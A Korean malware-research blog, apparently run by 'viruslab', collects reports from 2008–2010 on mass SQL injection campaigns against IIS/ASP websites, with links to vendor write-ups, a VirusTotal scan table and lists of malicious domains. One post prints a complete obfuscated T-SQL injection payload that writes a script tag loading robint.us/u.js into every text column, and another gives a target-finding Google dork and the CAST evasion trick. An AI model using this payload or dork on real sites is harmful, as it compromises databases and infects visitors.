태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

신종악성코드정보2010.06.10 13:02


http://blog.sucuri.net/2010/06/mass-infection-of-iisasp-sites-robint-us.html

http://isc.sans.edu/diary.html?storyid=8935

http://www.sophos.com/blogs/sophoslabs/?p=9941

0xdEcLaRe @t vArChAr(255),@c vArChAr(255) dEcLaRe tAbLe_cursoR cUrSoR FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe='u' AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167) oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0) bEgIn exec('UpDaTe ['+@t+'] sEt ['+@c+']=rtrim(convert(varchar(8000),['+@c+']))+cAsT(0x3C736372697074207372633D687474703A2F2F77772E726F62696E742E75732F752E6A733E3C2F7363726970743E aS vArChAr(51)) where ['+@c+'] not like ''%robint%''') fEtCh next FrOm tAbLe_cursoR iNtO @t,@c eNd cLoSe tAbLe_cursoR dEAlLoCaTe tAbLe_cursoR;--

cAsT(0x3C736372697074207372633D687474703A2F2F77772E726F62696E742E75732F752E6A733E3C2F7363726970743E

decoded:
0x<script src=http://ww.robint.us/u.js></script>

사용자 삽입 이미지

u.js 공격은 얼마전 한국 사이트에서도 다수 발견된바 있는 dnf666.net/u.js 의 변종 공격입니다.
작년 한해 동안 계속 이어지다가 잠시 소강 국면 상태였는데.. 다시 시작된 느낌입니다.

ARP Spoofing 도 증가되는거 아닌지 모르겠네요.





Posted by viruslab
신종악성코드정보2009.09.02 09:08


9월 1일부터 SQL Injection 공격코드가 다수 목격되고 있습니다.

a.js, x.js 등등

사용자 삽입 이미지

http://www.virustotal.com/analisis/4636b8e5142447a4174108e510c21292c91868c51e84cf5368d5e604a08589d4-1251838122

Antivirus Version Last Update Result
a-squared 4.5.0.24 2009.09.01 -
AhnLab-V3 5.0.0.2 2009.09.01 -
AntiVir 7.9.1.7 2009.09.01 -
Antiy-AVL 2.0.3.7 2009.09.01 -
Authentium 5.1.2.4 2009.09.01 -
Avast 4.8.1335.0 2009.09.01 -
AVG 8.5.0.406 2009.09.01 -
BitDefender 7.2 2009.09.01 -
CAT-QuickHeal 10.00 2009.09.01 -
ClamAV 0.94.1 2009.09.01 -
Comodo 2173 2009.09.01 -
DrWeb 5.0.0.12182 2009.09.01 modification of Trojan.Click.26559
eSafe 7.0.17.0 2009.09.01 -
eTrust-Vet 31.6.6714 2009.09.01 -
F-Prot 4.5.1.85 2009.09.01 -
Fortinet 3.120.0.0 2009.09.01 -
GData 19 2009.09.01 -
Ikarus T3.1.1.68.0 2009.09.01 -
Jiangmin 11.0.800 2009.09.01 -
K7AntiVirus 7.10.833 2009.09.01 -
Kaspersky 7.0.0.125 2009.09.01 -
McAfee 5727 2009.09.01 -
McAfee+Artemis 5727 2009.09.01 -
McAfee-GW-Edition 6.8.5 2009.09.01 -
Microsoft 1.5005 2009.09.01 -
NOD32 4387 2009.09.01 -
Norman 2009.09.01 -
nProtect 2009.1.8.0 2009.09.01 -
Panda 10.0.2.2 2009.09.01 -
PCTools 4.4.2.0 2009.08.31 -
Prevx 3.0 2009.09.01 -
Rising 21.45.14.00 2009.09.01 -
Sophos 4.45.0 2009.09.01 -
Sunbelt 3.2.1858.2 2009.09.01 -
Symantec 1.4.4.12 2009.09.01 -
TheHacker 6.3.4.3.393 2009.08.31 -
TrendMicro 8.950.0.1094 2009.09.01 -
VBA32 3.12.10.10 2009.09.01 -
ViRobot 2009.9.1.1911 2009.09.01 -
VirusBuster 4.6.5.0 2009.09.01 -
Additional information
File size: 523 bytes
MD5   : 7edb05c16956594ff052a7f0cf41f49e
SHA1  : c3c9412bafd063522840baf9ba42173711337744

Posted by viruslab
신종악성코드정보2008.05.14 17:29


최근의 다량의 웹 페이지가 중국의 SQL Injection 공격으로 악성 스크립트와 트로이목마 등의 배포에 사용되고 있다.

특히 자동화된 공격으로 인하여 많은 사이트가 다량의 피해를 입고 있다는 점에서 주목해야 할 부분이다.


초창기에 이슈가 되었던 fuckjp.js 가 기본설정으로 포함되어 있다.
물론 최근에는 변형되어 다수 사용되어 지고 있다.

사용자 삽입 이미지

이 SQL Injection 툴은 ATI(AMD) 프로그램 아이콘을 사용하는 것이 특이하며, Form Caption 을 CLI 로 사용하였다.

Embedded Web Browser (http://bsalsa.com) 를 사용하며, Google 에서 inurl:".asp" inurl:"b=" 과 같은 쿼리를 이용하여 취약한 사이트를 찾게 된다.

http://www.google.com/search?num=100&hl=en&lr=&newwindow=1&as_qdr=all&q=inurl%3A%22.asp%22+inurl%3A%22c%3D%22&btnG=Search

사용자 삽입 이미지

사용자 삽입 이미지

아래와 같은 공격을 시도하게 된다.

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select .name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and <일부제거> FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<악성코드>''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor ;DECLARE%20@S%20NVARCHAR 4000);SET%20@S=CAST(%20AS%20NVARCHAR(4000));EXEC(@S);--

Obfuscate Attack 을 하기 위해서 CAST 구문을 이용하여 탐지를 회피하는데 사용한다.

Joe Stewart 가 분석한 SQL Injection Attak Tool 은 Win32 console 로 제작되어 있다.

http://www.secureworks.com/research/threats/danmecasprox/
http://www.virustotal.com/analisis/d7d5aa4b4b6e56e060b695f986f709a4

사용자 삽입 이미지

Posted by viruslab
신종악성코드정보2008.05.08 09:26


SANS ISC 에서 다수의 SQL Injection 공격으로 인한 Exploit Script Code 삽입 피해를 보고했다.

http://isc.sans.org/diary.html?storyid=4393

하지만 해당 공격이 포착된 시점은 이미 좀 전이고, 악성코드를 링크한 일부 사이트 등도 기존에 사용되었던 곳 중 하나이다.

ISC 에서 보고한 것을 다시 정리하면 아래와 같고 현재 일부는 차단이 된 상태이다. (최종 설치되는 EXE 샘플도 모두 확보한 상태)

hxxp://winzipices.cn
hxxp://www.51.la
hxxp://bbs.jueduizuan.com
hxxp://bluell.cn
hxxp://js.users.51.la

jueduizuan 의 ip.js 에 의해서 메인 사이트로 연결되고 ESC가 정상적으로 작동될 경우 아래의 파일을 설치하도록 되어 있다.

링크된 파일 중 14.htm 은 아래와 같이 MS06-014 Exploit Code 를 사용하였다.

사용자 삽입 이미지

그외 MS07-004, Real Player Exploit 등의 취약점이 이용되고 있다.

해당 공격에 대해서 시만텍에서는 최종 악성코드 분석정보를 공개하였다.

[W32.Wowinzi.A]
http://www.symantec.com/business/security_response/writeup.jsp?docid=2008-050714-5642-99&tabid=2

아래 유포된 파일외에서도 악성코드 서버에는 다량의 악성코드가 존재한다.

ri.exe (38,400 바이트)
test.exe (28301 바이트)
1.exe (38400 바이트)

악성코드에 감염이 되면 Rootkit 과 트로이목마가 설치되며, 일부 확인된 바로는 Otwycal 변종도 설치되는듯 싶다.

특정 Exploit 이 실행되면 월드 오브 워 크래프트(온라인 게임)의 캡처화면이 있는 링크를 연결시킨다.

http://www.bsu.edu/web/nmmakridakis/images/lolret1.jpg
http://www.bsu.edu/web/nmmakridakis/images/lolret2.jpg
http://www.bsu.edu/web/nmmakridakis/images/lolret3.jpg
http://www.bsu.edu/web/nmmakridakis/images/lolret4.jpg
http://www.bsu.edu/web/nmmakridakis/images/lolret5.jpg
http://www.bsu.edu/web/nmmakridakis/images/lolret6.jpg
http://www.bsu.edu/web/nmmakridakis/images/lolret7.jpg
http://www.bsu.edu/web/nmmakridakis/images/lolret8.jpg

Posted by viruslab